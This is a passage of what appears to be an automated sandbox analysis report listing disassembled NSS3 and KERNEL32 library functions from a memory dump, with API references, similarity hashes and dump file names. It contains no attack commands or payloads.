                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?), ref: 6C491ECC
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C491EDF
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C491EEF
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?), ref: 6C491F37
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C491F44
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3539092540-0
                                                                                                                                                                                                                          • Opcode ID: 999c711e5f7b85a5df38c5916499dfa52b84e79e4243495c77f7ac4398bc7d39
                                                                                                                                                                                                                          • Instruction ID: c05e9eedb646e5f44062af1232e100f7daa30b08368bf1477ec6294c88d06476
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 999c711e5f7b85a5df38c5916499dfa52b84e79e4243495c77f7ac4398bc7d39
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3471AC76A047119FD700CF24D840E5ABBF5FF88358F144929E89A93B21E731F959CB92
                                                                                                                                                                                                                          Function 6C51DD70 Relevance: 7.7, APIs: 5, Instructions: 179COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C51DD8C
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DDB4
                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00000000), ref: 6C51DE1B
                                                                                                                                                                                                                          • ReleaseSemaphore.KERNEL32(?,00000001,00000000), ref: 6C51DE77
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalLeaveSection$ReleaseSemaphoreValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2700453212-0
                                                                                                                                                                                                                          • Opcode ID: d6f5a230f82eab165e02f713dda35fd80ac3603963d6e210637e0f7ac8ad456f
                                                                                                                                                                                                                          • Instruction ID: 107bba80868dd3a6f07b6afedddcd133c3c5198c6288bb9688413620d7c99b31
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d6f5a230f82eab165e02f713dda35fd80ac3603963d6e210637e0f7ac8ad456f
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 47716771A08314CFEB10CF99C9C869AB7B4FF89718F25816DD9596BB02D770A941CF80
                                                                                                                                                                                                                          Function 6C48DFA0 Relevance: 7.6, APIs: 5, Instructions: 143COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(D958E852,6C491397,5B5F5EC0,?,?,6C48B1EE,2404110F,?,?), ref: 6C48AB3C
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(D958E836,?,6C48B1EE,2404110F,?,?), ref: 6C48AB49
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(5D5E6C68), ref: 6C48AB5C
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(5D5E6C5C), ref: 6C48AB63
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: DeleteCriticalSection.KERNEL32(0148B821,?,2404110F,?,?), ref: 6C48AB6F
                                                                                                                                                                                                                            • Part of subcall function 6C48AB10: free.MOZGLUE(0148B805,?,2404110F,?,?), ref: 6C48AB76
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFDA
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48DFF3
                                                                                                                                                                                                                          • PK11_IsFriendly.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E029
                                                                                                                                                                                                                          • PK11_IsLoggedIn.NSS3 ref: 6C48E046
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PK11_GetInternalKeySlot.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FAF
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Now.NSS3(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FD1
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C498FFA
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499013
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499042
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: TlsGetValue.KERNEL32(?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?,00000007), ref: 6C49905A
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: EnterCriticalSection.KERNEL32(?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353,?), ref: 6C499073
                                                                                                                                                                                                                            • Part of subcall function 6C498F70: PR_Unlock.NSS3(?,?,?,?,00000002,?,?,?,6C48DA9B,?,00000000,?,?,?,?,CE534353), ref: 6C499111
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C48B266,6C4915C6,?,?,6C4915C6), ref: 6C48E149
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalSection$DeleteEnterK11_UnlockValuefree$FriendlyInternalLoggedSlot
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4224391822-0
                                                                                                                                                                                                                          • Opcode ID: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                          • Instruction ID: e1869026af028a5878eb97a2e19af32a448678c643758ebec02bd3d2e935a0b9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 61a2ca6159a9209e52a7d1b40b5138d84bd189513a760f8fd71e68f511133cec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C3513378602611CBDB10DF29C484F6ABBF1AF85309F19896CD9998BB41D731E884CBC2
                                                                                                                                                                                                                          Function 6C49BE90 Relevance: 7.6, APIs: 5, Instructions: 141COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,00000000,?,?), ref: 6C49BF06
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(00000000,00000001), ref: 6C49BF56
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000,?,?,6C479F71,?,?,00000000), ref: 6C49BF7F
                                                                                                                                                                                                                          • CERT_DestroyCertificate.NSS3(00000000), ref: 6C49BFA9
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000001), ref: 6C49C014
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Item_Util$Zfree$CertificateDestroyEncodeError
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3689625208-0
                                                                                                                                                                                                                          • Opcode ID: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                          • Instruction ID: f6500dc44803987a25ea61dc1f1b1107328e37baef31a1bb060311911bf09f16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f1dfcfe6605d0996bfd1255d3afdc4ea293b82dfc463d35c1224ee705283ecc3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1741E975B012119BEB10DE65CC80FBA7BB9AF45209F114128ED1AD7B45FB31D905CBE1
                                                                                                                                                                                                                          Function 6C46EDE0 Relevance: 7.6, APIs: 5, Instructions: 97COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C46EDFD
                                                                                                                                                                                                                          • calloc.MOZGLUE(00000001,00000000), ref: 6C46EE64
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE8AC,00000000), ref: 6C46EECC
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000000,?,?), ref: 6C46EEEB
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C46EEF6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorValuecallocfreememcpy
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3833505462-0
                                                                                                                                                                                                                          • Opcode ID: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                          • Instruction ID: 1769c739fabcabf9237554b4ccb8e46445cd88f911ffd4e05541cdc027d2466b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7405ca5d9967a776f96834a3bda80a37163754411222826b3671891bc4f714dc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C83134B1A006009BEB20DF2ACC84F667BF4FB46306F050629E95A87F54E731E815CBD9
                                                                                                                                                                                                                          Function 6C481F10 Relevance: 7.6, APIs: 5, Instructions: 96COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C481F1C
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(00000000,0000000100000017,FFFFFFFF,6C599EBC), ref: 6C481FB8
                                                                                                                                                                                                                          • SEC_ASN1EncodeItem_Util.NSS3(6C599E9C,?,?,6C599E9C), ref: 6C48200A
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE022,00000000), ref: 6C482020
                                                                                                                                                                                                                            • Part of subcall function 6C476A60: PORT_ArenaAlloc_Util.NSS3(?,?,?,?,?,?,?,6C47AD50,?,?), ref: 6C476A98
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C482030
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$ArenaArena_EncodeItem_$Alloc_ErrorFreeInitLockPoolcalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1390266749-0
                                                                                                                                                                                                                          • Opcode ID: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                          • Instruction ID: 5b94228ea7dfd8f95bfcff3d543af35f26d41ceffa2ba222fa40132b4c6fd94e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: afa848b778c8f04ea3b2a6bce5e139eb2174aeeafd40ad6ebd8bd44e2ad9f7ae
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 98219375902506ABEB11DA15DC40FEA7778FF42219F140225ED3996F90EB32E528C7E2
                                                                                                                                                                                                                          Function 6C471DD0 Relevance: 7.6, APIs: 5, Instructions: 81timeCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E0B
                                                                                                                                                                                                                          • DER_DecodeTimeChoice_Util.NSS3(?,?), ref: 6C471E24
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C471E3B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471E8A
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE00B,00000000), ref: 6C471EAD
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Error$Choice_DecodeTimeUtil
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1529734605-0
                                                                                                                                                                                                                          • Opcode ID: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                          • Instruction ID: 2769958b98d2b8984ef7d237bb316a0049d0f6c502fb4ada5162b73544ee4a5b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b0b168a3d74ffec76d73eb17694a10085facb2cfa8deea268b53177d9d8b38ee
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3221F172E08210A7E710DE68DC51F8A73949B84329F154638FD6D57B80E730E90887E2
                                                                                                                                                                                                                          Function 6C491850 Relevance: 7.6, APIs: 5, Instructions: 76COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3(?,?,6C49002B,?), ref: 6C491875
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,6C49002B,?), ref: 6C49188E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,6C49002B,?), ref: 6C4918A7
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3(?,?,?,?,6C49002B,?), ref: 6C491905
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,6C49002B,?), ref: 6C491912
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Value$CriticalEnterSection$Monitor$ExitLeaveUnlock
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3539092540-0
                                                                                                                                                                                                                          • Opcode ID: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                          • Instruction ID: b0ccaa5d021d374cbd0cf9815fed14040660a14f2c188a6f392211dd70ca8444
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3525ace8ce06f9db112340df955acad6d2219220bb71059bb9d60e20300d3f6d
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19214F74A446259BDB00EF79C484E99BBF8FF06359F114A29D894C7B00E730E994CBD2
                                                                                                                                                                                                                          Function 6C581E40 Relevance: 7.6, APIs: 5, Instructions: 75threadCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C581E5C
                                                                                                                                                                                                                            • Part of subcall function 6C539BF0: TlsGetValue.KERNEL32(?,?,?,6C580A75), ref: 6C539C07
                                                                                                                                                                                                                          • PR_Lock.NSS3(00000000), ref: 6C581E75
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C581EAB
                                                                                                                                                                                                                          • PR_GetCurrentThread.NSS3 ref: 6C581ED0
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C581EE8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CurrentThread$ErrorLockUnlockValue
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 121300776-0
                                                                                                                                                                                                                          • Opcode ID: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                          • Instruction ID: 0e3e7c132015e4ad3ee8e112b9a22b1ad29bcedb377a46287772c0c6ffe5da16
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8f82d8443f40325f91a12faa91a1701402969371f38a66493c83f1fcf5903e3e
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CB217C74A165229BD710CF19DD40A47BBB1BF84718B258225D8299BF40D730FC54CBE5
                                                                                                                                                                                                                          Function 6C4CBE60 Relevance: 7.6, APIs: 5, Instructions: 74memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000,00000000,00000000,00000000,?,6C47E708,00000000,00000000,00000004,00000000), ref: 6C4CBE6A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0840: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C4D08B4
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(00000000,?,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?), ref: 6C4CBE7E
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: PORT_ArenaAlloc_Util.NSS3(00000000,E0056800,00000000,?,?,6C4C8D2D,?,00000000,?), ref: 6C4CFB85
                                                                                                                                                                                                                            • Part of subcall function 6C4CFB60: memcpy.VCRUNTIME140(00000000,6A1BEBC6,E0056800,?), ref: 6C4CFBB1
                                                                                                                                                                                                                          • SECITEM_CopyItem_Util.NSS3(?,?,?,?,?,?,00000000,?,?,?,?,?,?,?,00000000,?), ref: 6C4CBEC2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000,00000000,?,?,?,?,?,?,?,00000000,?,?,6C4804DC,?,?), ref: 6C4CBED7
